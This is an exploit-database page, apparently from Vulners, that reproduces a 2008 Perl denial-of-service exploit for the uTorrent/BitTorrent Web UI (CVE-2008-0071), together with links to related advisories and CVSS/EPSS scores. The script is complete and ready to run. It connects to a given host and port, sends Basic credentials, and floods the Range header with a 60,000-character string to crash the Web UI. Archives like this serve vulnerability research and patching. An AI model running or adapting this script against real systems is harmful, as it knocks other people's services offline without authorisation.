Lucene search
+L

μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service

🗓️ 23 Jun 2008 00:00:00Reported by ExodusType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-0071
23 Jun 200800:00
circl
CVE
CVE-2008-0071
16 Jun 200818:26
cve
Cvelist
CVE-2008-0071
16 Jun 200818:26
cvelist
NVD
CVE-2008-0071
16 Jun 200818:41
nvd
Prion
Design/Logic Flaw
16 Jun 200818:41
prion
Prion
Buffer overflow
4 Sep 200910:30
prion
RedhatCVE
CVE-2008-7166
9 Jan 202610:27
redhatcve
securityvulns
[Full-disclosure] Secunia Research: uTorrent / BitTorrent Web UI HTTP "Range" Header DoS
11 Jun 200800:00
securityvulns
securityvulns
uTorrent / BitTorrent DoS
11 Jun 200800:00
securityvulns
seebug.org
uTorrent和BitTorrent HTTP Range头远程拒绝服务漏洞
14 Jun 200800:00
seebug
Rows per page
#!/usr/bin/perl
# uTorrent / BitTorrent  WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
# according to the following advisory: http://secunia.com/advisories/30605
#
# usage: WebUI-dos.pl <url> <port> <user:pass>
# Exploit written by Exodus.
# http://www.blackhat.org.il

use IO::Socket;
use MIME::Base64;

if(@ARGV < 3)
{ &usage; }

($host,$ref) = split(/\//,$ARGV[0]);

$sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
$buff = "E" x 60000;
$up = encode_base64($ARGV[2]);
chomp($up);

print $sock "GET /gui/common.js HTTP/1.1\r\n".
"Host: $host\r\n".
"Authorization: Basic $up\r\n".
"Range: bytes=$buff\r\n".
"Connection: close\r\n\r\n";

close($sock);

print "[!]Payload sent, WebUI should be down...\n";



sub usage
{
	print "usage $0 <url> <port> <user:pass>\n".
		  "ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
	exit;
}

# milw0rm.com [2008-06-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Mar 2018 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.0719
24